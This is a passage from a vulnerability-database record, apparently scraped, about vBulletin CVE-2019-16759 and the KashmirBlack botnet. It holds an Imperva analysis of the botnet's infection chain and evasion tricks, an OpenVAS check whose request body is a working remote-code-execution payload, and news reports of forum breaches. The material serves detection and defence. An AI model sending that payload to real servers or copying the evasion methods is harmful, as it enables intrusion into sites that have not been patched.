repurpose) and the outcome of spreading and pending bots.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-9-bot-entities-actions-and-outcomes-.png>)\n\nFigure 9: bot entities actions and outcomes\n\n**Victim server** \nA victim server is a site running CMS platforms, such as WordPress, Joomla! or, Drupal, targeted by the C&C. \nBy analyzing the attack instructions received by our dummy \u2018spreading bot\u2019, we discovered that most of the attack\u2019s target victim sites were located in the US.\n\n## Spreading Technique\n\n### The Different Exploits and Their Outcomes\n\nThe below table shows the exploits being used by the \u2018spreading bot\u2019 and their outcomes. \nOnly one exploit - PHPUnit RCE - results in an infection that causes a victim site to become a new \u2018spreading bot\u2019 in the botnet. \nOtherwise, 14 exploits result in an infection that leads to a victim site becoming a new \u2018pending bot\u2019 in the botnet, and one results in defacement.\n\nOutcome | Exploit \n---|--- \nSpreading bot | \n\n * PHPUnit Remote Code Execution - CVE-2017-9841 \nPending bot | \n\n * JQuery [file upload](<https://chrissymorgan.co.uk/2018/11/25/unauthenticated-arbitrary-file-upload-vulnerability-in-blueimp-jquery-file-upload-v9-22-0/>) vulnerability - CVE-2018-9206\n * ELFinder Command Injection - CVE-2019-9194\n * Joomla! remote [file upload](<https://www.exploit-database.net/?id=20189>) vulnerability\n * Magneto Local [File Inclusion](<https://www.exploit-db.com/exploits/35996>) - CVE-2015-2067\n * Magento [Webforms Upload Vulnerability](<https://malware.expert/malware/magento-webforms-upload-vulnerability/>)\n * CMS Plupload [Arbitrary File Upload](<https://support.alertlogic.com/hc/en-us/articles/115005896463-CMS-Plupload-Arbitrary-File-Upload->)\n * Vulnerability - CVE-2015-7571 and many unregistered\n * Multiple vulnerabilities including File Upload & RCE for many plugins in multiple platforms [here](<https://securityonline.info/icg-autoexploiterbot-exploit-wordpress-joomla-drupal-oscommerce-prestashop-opencart/>)\n * WordPress TimThumb RFI Vulnerability - CVE-2011-4106\n * Uploadify RCE vulnerability\n * vBulletin Widget [RCE](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759>) - CVE-2019-16759\n * WordPress install.php [RCE](<https://www.exploit-db.com/exploits/18417>)\n * WordPress xmlrpc.php Login [Brute-Force attack](<https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions/>)\n * WordPress multiple Plugins RCE (see full list in [appendix A](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/CrimeOps-of-the-KashmirBlack-Botnet-Appendix.pdf>))\n * WordPress multiple Themes RCE (see full list in [appendix B](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/CrimeOps-of-the-KashmirBlack-Botnet-Appendix.pdf>)) \nDefacement | \n\n * Webdav [file upload](<https://null-byte.wonderhowto.com/how-to/exploit-webdav-server-get-shell-0204718/>) \n \nThe following sections describe the spreading technique used by the KashmirBlack botnet. \n\n### Entry Point\n\nThe spreading technique relies on the fact that many Linux servers come out of the box with Python and Perl installed, which makes the attack easy to carry out. \nA \u2018spreading bot\u2019 tries to infect a victim server with the botnet malicious script that constantly communicates with the C&C. In other words, it adds the victim server to the KashmirBlack botnet as a new \u2018spreading bot\u2019.\n\nThe PHPUnit RCE vulnerability allows the attacker to inject a php code that will be executed on the victim server (for additional details you can read: ['The resurrection of PHPUnit RCE Vulnerability'](<https://www.imperva.com/blog/the-resurrection-of-phpunit-rce-vulnerability/>)). During the analysis of the vulnerability, we came across an HTTP POST request to eval-stdin.php made by a \u2018spreading bot\u2019 in an attempt to exploit CVE-2017-9841. The below request in Figure 10, infects the victim and adds it to the KashmirBlack botnet. \n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-10-HTTP-POST-request-to-infect-the-victim-.png>)\n\nFigure 10: HTTP POST request to infect the victim\n\nThe code in Figure 11 is located in the request body of the above POST request:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-11-The-POST-request-body-.png>)\n\nFigure 11: The POST request body\n\nThe code downloads a Perl script from the C&C, executes it and deletes any traces.\n\n**Traber Perl script** \nThe Perl script, **traber.pl**, mentioned in Figure 12, is a combination of Perl and base64 encoded commands:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-12-traber-Perl-script-.png>)\n\nFigure 12: traber Perl script\n\nTraber.pl eventually creates a new cron job to be executed every three minutes. \nCrontab is a UNIX command that creates a table or list of jobs scheduled to run at regular intervals on the system.\n\n**The cron job** \nWe decoded the above cron job:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-13-The-decoded-crontab-job-.png>)\n\nFigure 13: The decoded crontab job\n\nEvery three minutes, the \u2018spreading bot\u2019 would perform a request to the \u2018load balancer\u2019 to get the address of one of the multiple repositories in \u2018repository A\u2019, which stores the KashmirBlack botnet malicious script that communicates with the **C&C**.\n\nThe cron job was trying to stay undetected by creating a unique and deep path under /tmp folder, using several hidden folders to store the malicious script called **\u2018update.py\u2019**.\n\nDuring the entire cron job, we could see evidence of a highly cautious attacker who was careful to ensure his actions always remained under the radar.\n\n**Entry Point Summary** \nThe entire process of turning a victim into a \u2018spreading bot\u2019 starts with exploiting PHPUnit RCE vulnerability (CVE-2017-9841) on the victim\u2019s server, causing php code to be executed, and downloading **\u2018traber.pl\u2019** perl script from the **C&C**. It then continues with a scheduling job which downloads the malicious script from \u2018repository A\u2019, before executing a Python script **\u2018update.py\u2019** to communicate with the **C&C**.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-14-KashmirBlack-\u2018spreading-bot-infection-flow-diagram-.gif>)\n\nFigure 14: KashmirBlack \u2018spreading bot infection flow diagram\n\n### Botnet Malicious Script (update.py)\n\nNow we are going to reveal the mechanism used to control and operate the KashmirBlack botnet. \nThe infected victim from the above spreading process becomes a new \u2018spreading bot\u2019, constantly communicating with the C&C to receive attack instructions. In the section below we\u2019ll describe the attack structure in depth.\n\nThe initial communication with the C&C is via **\u2018update.py\u2019** script. \nThe malicious script grabs attack instructions by sending an HTTP GET request to hxxp://<C&C_server>/archerhome/**index.php**:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-15-HTTP-GET-request-to-get-instructions-.png>)\n\nFigure 15: HTTP GET request to get instructions\n\nThis HTTP request utilizes some specially crafted headers:\n\n * User Agent: ArcherGhost8\n * IP: < Bot Ip >\n * Upgrade-Insecure-Requests: 1\n * COUNTRYCODE: < Country two letters code >\n\nThe **C&C** will not respond unless these are in place. \nThis is a 'security' measure the attacker uses to keep unwanted actors from receiving attack information from the **C&C**.\n\n**Attack Instructions** \nThe response for the HTTP GET request to \u2018index.php\u2019 will return attack instructions formatted in JSON:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-16-JSON-with-attack-instructions-form-the-CC.png>)\n\nFigure 16: JSON with attack instructions form the CC\n\nThe structure:\n\n * \u2018script\u2019 - commands that will be executed by the \u2018spreading bot\u2019 server\n * \u2018payload\u2019 - list of victim sites that will be attacked by the \u2018spreading bot\u2019 server\n * \u2018argv\u2019 - the hostname/IP that hosts the victim sites\n\n**Receiving Attack Instructions** \nWhile impersonating a \u2018spreading bot\u2019, we received attack instructions from the C&C for several months. Based on the collected instructions, we found that a \u2018spreading bot\u2019 attacks an average of 240 hosts - or 3,450 victim sites - per day.\n\nNote: \nAlthough we don\u2019t know the exact number of bots in the botnet, we can assume its size from the data we collected,and suspect that it\u2019s in the region of hundreds of thousands of bots.\n\n285 (spreading bots IPs we saw in our data) * 240 (attacked victims) = around 70,000 (Victim Servers attacks per day)\n\nAssuming that only 1 percent of the attacks are successful, it means that around 700 bots are added to the botnet every day. The operation continued for at least 11 months - approximately 330 days. Without considering that the number of attacks increases exponentially every day, we will have the following over the 11 month period: \n330 (days) * 700 (bots per day) = 230,000 bots. \n\nThe 285 IPs we identified as KashmirBlack spreading bots that attacked our customers are probably only a fraction of the entire botnet, so the potential of this growth is much bigger.\n\nWe suspect that the C&C has a scanner that searches for sites running CMS platforms, creates an attack instruction JSON with the new found sites, and pushes it into a queue waiting for bots to receive them and attack.\n\nAs of today there are more than 20 distinct exploits (the \u2018script\u2019 field). The next section will focus on the exploit execution.\n\n**The Exploit** \nThe exploit script given as part of the attack instruction has the following structure:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-17-exploit-script-.png>)\n\nFigure 17: Exploit script\n\nThe \u2018spreading bot\u2019 downloads a bundle of exploit and payload from hxxps://**\u2018repository B\u2019**/css/inmemoryXXX.css. It then executes the exploit to attack victim sites defined in the attack instruction.\n\nThe execution consists of four steps:\n\n 1. Exploit a vulnerability\n 2. Deliver a malicious payload\n 3. Verify delivery\n 4. Report to the C&C upon success\n\n**The Payload** \nThere are two types of payloads for spreading the KashmirBlack botnet\n\n * traber.pl - to transform a victim server into a \u2018spreading bot\u2019\n * sssp.php backdoor - to transform a victim server into a \u2018pending bot\u2019\n\n**The Backdoor** \nThe **'sssp'** Backdoor uploaded to the victim site is a simple PHP webshell to upload files, and is used to gain persistence access to the victim\u2019s site.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-18-PHP-Backdoor-Code-.png>)\n\nFigure 18: PHP Backdoor Code\n\n### Techniques used by the malicious script\n\nThe \u2018sssp\u2019 backdoor is constructed with different extensions, for example: \n['sssp.php','sssp.phtml','sssp.php.pjpg','sssp.pHp','sssp.php.fla','sssp.pHp5\u2032]. This is an **evasion technique** to remain undetected or being blocked by security methods used to prevent malicious file upload.\n\nThe POST request to upload the backdoor uses 269 random User-Agent headers, which is also an **evasion technique**:\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-19-20-Random-User-Agent-Header-.png>) \n\u2026 \n\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-19-20-Random-User-Agent-Header2-.png>)\n\nFigure 19-20: Random User Agent Header\n\nFigure 21 below shows the steps of the report phase on a successful backdoor upload:\n\n 1. The C&C reporting address is base64-encoded to avoid mentioning the C&C address in clear text. Decoding it reveals the C&C address: hxxps://<C&C_server>/adeliap/405.php\n 2. The POST request uses a specially crafted User Agent (\u2018ArcherGhost\u2019)\n 3. The JSON reports of the new backdoor in place is encoded before being sent to the C&C\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-21-The-\u2018senddata-function-that-reports-to-the-CC.png>)\n\nFigure 21: The \u2018senddata' function that reports to the CC\n\n### Malicious Script Technique Overview\n\nThe victim infected in the spreading process becomes a new \u2018spreading bot\u2019 in the KashmirBlack botnet. As a \u2018spreading bot\u2019 running the \u2018update.py\u2019 malicious script, it communicates with the **C&C** every three minutes to receive an attack instruction. \nThe attack instruction contains a list of victim sites that will be attacked and the remote location of an exploit bundle. The \u2018spreading bot\u2019 downloads the exploit and payload bundle from **\u2018repository B\u2019**. It then runs the exploit on the victim site, delivering one of two payloads - one transforming the victim site into a \u2018spreading bot\u2019, and the other transforming it into a pending bot. In a successful attempt, the \u2018spreading bot\u2019 will report to the **C&C**.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/Figure-22-KashmirBlack-botnet-spreading-flow-diagram-.gif>)\n\nFigure 22: KashmirBlack botnet spreading flow diagram\n\n## Summary\n\nThis blog describes a complex and constantly evolving botnet operation; only possible with a great and well-designed infrastructure.\n\nDuring our research we witnessed its evolution from a medium-volume botnet with basic abilities to a massive infrastructure that is here to stay.\n\n### Indicators of Compromise\n\nThe KashmirBlack botnet infection varies. There are several traces that indicate a server is compromised and taking part in the botnet. Each role in the botnet has different indications of infection. For additional details see [appendix C](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/10/CrimeOps-of-the-KashmirBlack-Botnet-Appendix.pdf>).\n\n### How to Remediate?\n\nThere are several actions that should be performed in case your server is infected by the KashmirBlack botnet:\n\n * Kill malicious processes\n * Remove malicious files\n * Remove suspicious / unfamiliar cron jobs\n * Remove unused plugins and themes\n\nThe site administrator should ensure the CMS core files and third party modules are always up-to-date and properly configured. In addition, access should be denied to sensitive files and paths such as install.php, wp-config.php, and eval-stdin.php. \nStrong and unique passwords are recommended, as they are the first defence against brute force attacks.\n\nNowadays, when cybercrime is so common and new vulnerabilities are disclosed on a daily basis, we highly recommend deploying a web application firewall (WAF) to ensure your site is protected.\n\n### How do Imperva products protect you from KashmirBlack?\n\nImperva WAF customers are protected and are not affected by the botnet operation. The WAF has a layered approach to block such activity. \nThe **Bad Bots** policy will detect the malicious traffic of the bots to the site and the **Malicious File Upload** policy will block webshell upload. In addition **Remote Code Execution** signatures will prevent the payloads execution and the **Backdoor Protection** mechanism will prevent backdoor usage by the attacker.\n\nBe safe & secure, \nImperva.\n\nThe post [CrimeOps of the KashmirBlack Botnet - Part II](<https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-22T18:55:05", "type": "impervablog", "title": "CrimeOps of the KashmirBlack Botnet \u2013 Part II", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4106", "CVE-2015-2067", "CVE-2015-7571", "CVE-2017-9841", "CVE-2018-9206", "CVE-2019-16759", "CVE-2019-9194"], "modified": "2020-10-22T18:55:05", "id": "IMPERVABLOG:132460062C8A11A5A73F937DEAA67CB9", "href": "https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-04-16T15:51:53", "description": "vBulletin is prone to an unauthenticated remote code execution vulnerability.", "cvss3": {}, "published": "2019-09-25T00:00:00", "type": "openvas", "title": "vBulletin 5.x < 5.5.2 Patch Level 1, 5.5.3 < 5.5.3 Patch Level 1, 5.5.4 < 5.5.4 Patch Level 1 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-16759"], "modified": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310142932", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142932", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:vbulletin:vbulletin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142932\");\n script_version(\"2020-04-15T09:02:26+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 09:02:26 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-09-25 04:05:17 +0000 (Wed, 25 Sep 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-16759\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_name(\"vBulletin 5.x < 5.5.2 Patch Level 1, 5.5.3 < 5.5.3 Patch Level 1, 5.5.4 < 5.5.4 Patch Level 1 RCE Vulnerability\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"vbulletin_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"vbulletin/detected\");\n\n script_tag(name:\"summary\", value:\"vBulletin is prone to an unauthenticated remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a crafted HTTP POST request and checks the response.\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker may execute arbitrary code on the system as the\n user running vBulletin.\");\n\n script_tag(name:\"affected\", value:\"vBulletin versions 5.x before 5.5.2 Patch Level 1, 5.5.3 before 5.5.3 Patch Level 1\n and 5.5.4 before 5.5.4 Patch Level 1.\");\n\n script_tag(name:\"solution\", value:\"Update to 5.5.2 Patch Level 1, 5.5.3 Patch Level 1, 5.5.4 Patch Level 1 or later.\n Please see the referenced vendor advisory for more information.\");\n\n script_xref(name:\"URL\", value:\"https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4422707-vbulletin-security-patch-released-versions-5-5-2-5-5-3-and-5-5-4\");\n script_xref(name:\"URL\", value:\"https://seclists.org/fulldisclosure/2019/Sep/31\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/\";\n\nheaders = make_array(\"Content-Type\", \"application/x-www-form-urlencoded\");\nvt_strings = get_vt_strings();\n\ncmds = exploit_commands();\nforeach pattern(keys(cmds)) {\n cmd = cmds[pattern];\n final_checks[pattern] = \"shell_exec%28%27\" + cmd;\n}\n\n# nb: shell_exec might be disabled so use bin2hex in addition to it.\nfinal_checks[vt_strings[\"default_rand_hex\"]] = \"bin2hex%28%27\" + vt_strings[\"default_rand\"];\n\nforeach pattern(keys(final_checks)) {\n\n cmd = final_checks[pattern];\n data = \"routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+\" + cmd + \"%27%29%3B+exit%3B\";\n\n req = http_post_put_req(port: port, url: url, data: data, add_headers: headers);\n res = http_keepalive_send_recv(port: port, data: req, bodyonly: TRUE);\n\n if (egrep(pattern: pattern, string: res)) {\n\n info['1. \"HTTP POST\" body'] = data;\n info['2. URL'] = http_report_vuln_url( port:port, url:url, url_only:TRUE );\n info['3. Used command'] = cmd;\n info['4. Expected result'] = pattern;\n\n report = 'By doing the following request:\\n\\n';\n report += text_format_table(array: info) + '\\n\\n';\n report += 'it was possible to execute a command on the target.';\n report += '\\n\\nResult: ' + res;\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:43", "description": "[](<https://thehackernews.com/images/-D1YWqD0VmLk/XZM1oajFtaI/AAAAAAAA1So/YtMUY09GjFk0H56g_O_htZEYhYxn4mr9ACLcBGAsYHQ/s728-e100/Comodo-vbulletin-forums.png>)\n\nIf you have an account with the Comodo discussion board and support forums, also known as ITarian Forum, you should change your password immediately. \n \nCybersecurity company Comodo has become one of the major victims of a recently disclosed [vBulletin 0-day vulnerability](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>), exposing login account information of over nearly 245,000 users registered with the Comodo Forums websites. \n \nIn a brief [security notice](<https://forums.comodo.com/general-announcements/important-security-notice-about-comodo-forums-accounts-t124921.0.html>) published earlier today, Comodo admitted the data breach, revealing that an unknown attacker exploited the vBulletin vulnerability (CVE-2019-16759) and potentially gained access to Comodo Forums database. \n \nIt's worth noting that Comodo forum was hacked on September 29, almost four days after vBulletin developers released a patch to let administrators address the vulnerability, but the company failed to apply the patches on time. \n \nAs The Hacker News broke the news last week, an anonymous hacker publicly disclosed details of a critical then-unpatched vulnerability in vBulletin\u2014one of the widely used internet forum software\u2014which could have allowed remote attackers to execute arbitrary commands on the web server. \n \nHowever, Comodo has not specified which of the company's forums has been hacked out of the two separate forums it owns. \n \nOne the forums, \"forums.comodo.com,\" is hosted at Comodo's own sub-domain and is powered by the different forum software, called Simple Machines Forum, and appears not to be impacted. \n \nThe second forum, which runs over the vBulletin software and has likely been hacked, is ITarian Forum hosted at \"forum.itarian.com,\" a discussion board where the company offers technical assistance to the users of its products. \n \n\n\n[](<https://thehackernews.com/images/-Rv1ReDGkeDk/XZM0KEdJyUI/AAAAAAAA1Sc/EzAerzwby9Ahun_vlQ2OzU-A8Ao6DkNAACLcBGAsYHQ/s728-e100/Comodo-vbulletin-forums-hacked.png>)\n\n \n\n\n## What Type of Information Was Accessed?\n\n \nThe breached database contains forum users' information, including: \n \n\n\n * Login username\n * Name\n * Email address\n * Hashed passwords\n * Last IP address used to access the forums\n * Some social media usernames in very limited situations.\n \nThe company became aware of the security breach over the weekend on September 29 morning, which suggests users registered on Comodo Forums until this Sunday are impacted by the breach. \n \n\n\n> \"Very recently a new vulnerability in the vBulletin software, which is one of the most popular server applications for website comments including the Comodo Forums, was made public,\" the company says.\n\n \n\n\n> \"Over the weekend at 4:57 am ET on Sunday, September 29, 2019, we became aware that this security flaw in the vBulletin software had become exploited resulting in a potential data breach on the Comodo Forums.\"\n\n \nImmediately after detecting the security intrusion, the Comodo IT infrastructure team immediately took the forums offline in an attempt to mitigate the vBulletin exploit and applied the recommended security patches. \n \n\n\n## What Users Should Do Now?\n\n \nIf you have registered with Comodo Forums on or before September 29, you are highly recommended to immediately change the password for your forum account to a strong and unique one and for any other online account where you use the same credentials. \n \nAlthough the account passwords were hashed in vBulletin for the Comodo Forum users, Comodo advises users to change their passwords as part of good password practices. \n \n\n\n> \"We deeply regret any inconvenience or distress this vulnerability may have caused you, our users,\" the company says. \n \n\"As members of our community of Comodo Forum users, we want to reassure you that we have put in place measures to ensure that vulnerabilities in third-party software, such as vBulletin, will be patched immediately when patches become available.\"\n\n \nBesides this, at the time of writing, the company has also temporarily disabled the registration for new users on the affected forums, The Hacker News confirmed.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-01T11:23:00", "type": "thn", "title": "Comodo Forums Hack Exposes 245,000 Users' Data \u2014 Recent vBulletin 0-day Used", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2019-10-01T11:39:49", "id": "THN:86C3930A6E4C818EFA5133059C21FA57", "href": "https://thehackernews.com/2019/10/Comodo-vbulletin-hacked.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:58", "description": "[](<https://thehackernews.com/images/-lO6J7aRP7a0/Xcl7h55teFI/AAAAAAAA1sA/jJrdfv_1UhMsLLsIeb5fAzEzTxxNiWV1wCLcBGAsYHQ/s728-e100/ZoneAlarm-forum-data-breach.png>)\n\nZoneAlarm, an internet security software company owned by Israeli cybersecurity firm Check Point Technologies, has suffered a data breach exposing data of its discussion forum users, the company confirmed The Hacker News. \n \nWith nearly 100 million downloads, ZoneAlarm offers antivirus software, firewall, and additional virus protection solutions to home PC users, small businesses, and mobile phones worldwide. \n \nThough neither ZoneAlarm or its parent company Check Point has yet publicly disclosed the security incident, the company quietly sent an alert via email to all affected users over this weekend, The Hacker News learned. \n \nThe email-based breach notification advised ZoneAlarm forum users to immediately change their forum account passwords, informing them hackers have unauthorizedly gained access to their names, email addresses, hashed passwords, and date of births. \n \nMoreover, the company has also clarified that the security incident only affects users registered with the \"**forums.zonealarm.com**\" domain, which has a small number of subscribers, nearly 4,500. \n \n\"This [forum] is a separate website from any other website we have and used only by a small number of subscribers who registered to this specific forum,\" the email notification reads. \n \n\"The website became inactive in order to fix the problem and will resume as soon as it is fixed. You will be requested to reset your password once joining the forum.\" \n \n\n\n## Hackers Exploited Recent vBulletin 0-Day Flaw\n\n \nUpon reaching out to the company, a spokesperson confirmed The Hacker News that attackers exploited a known critical RCE vulnerability ([CVE-2019-16759](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>)) in the vBulletin forum software to compromise ZoneAlarm's website and gain unauthorized access. \n \nFor those unaware, this flaw affected vBulletin versions 5.0.0 up to the latest 5.5.4, for which the project maintainers later released patch updates, but only for recent versions 5.5.2, 5.5.3, and 5.5.4. \n\n\n[](<https://thehackernews.com/images/-F7r0_5rBLkw/Xcl8ZDReWLI/AAAAAAAA1sI/0sC52j9ADsA7FkGqpPKB1-VZ3YYnbiENACLcBGAsYHQ/s728-e100/ZoneAlarm-forum.png>)\n\nThe Hacker News found that, surprisingly, the security company itself was running an outdated 5.4.4 version of the vBulletin software until last week that let attackers compromise the website easily. \n \nIt's the same [then-zero-day vBulletin exploit](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>) that an anonymous hacker publicly disclosed in late September this year, which, if exploited, could allow remote attackers to take full control over unpatched vBulletin installations. \n \nMoreover, a week after that, the same flaw was also exploited by unknown attackers to [hack the Comodo forum](<https://thehackernews.com/2019/10/Comodo-vbulletin-hacked.html>) website, which exposed login account information of over nearly 245,000 Comodo Forums users. \n \nThough the ZoneAlarm team learned about the breach just late last week and immediately informed affected users, it's unclear exactly when the attackers breached the website. \n\n\n[](<https://thehackernews.com/images/-HiAbp0IFtFU/XcmB5MYkaTI/AAAAAAAA1sU/3JZWoSzyWk8_KuSaH4s-ls9SE6qWJWjawCLcBGAsYHQ/s728-e100/ZoneAlarm-hacked.png>)\n\n\"ZoneAlarm is conducting an investigation into the matter. We take pride in the fact that we took a proactive approach once this incident was detected and within 24 hours and alerted the forum members,\" the company's spokesperson told the Hacker News. \n \nSince the ZoneAlarm forum website is down at the time of writing, users would not be able to change their account password on the forum at this moment. \n \nBut if you are one of the affected users, you are also recommended to change your passwords for any other online account where you use the same credentials, and do the same for the ZoneForum website as soon as the site goes live again. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-11T15:27:00", "type": "thn", "title": "Hackers Breach ZoneAlarm's Forum Site \u2014 Outdated vBulletin to Blame", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2019-11-11T15:44:48", "id": "THN:DA6A48C093F31D7EE1BB90D7EE577177", "href": "https://thehackernews.com/2019/11/zonealarm-forum-data-breach.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:44", "description": "[](<https://thehackernews.com/images/-jo4OCB7-bNU/XYpmETftYoI/AAAAAAAA1NE/b6JfG9m7GuYZKB5OYjDDarpoYXHBG1vQwCLcBGAsYHQ/s728-e100/vBulletin-zero-day-exploit.jpg>)\n\nAn anonymous hacker today publicly revealed details and 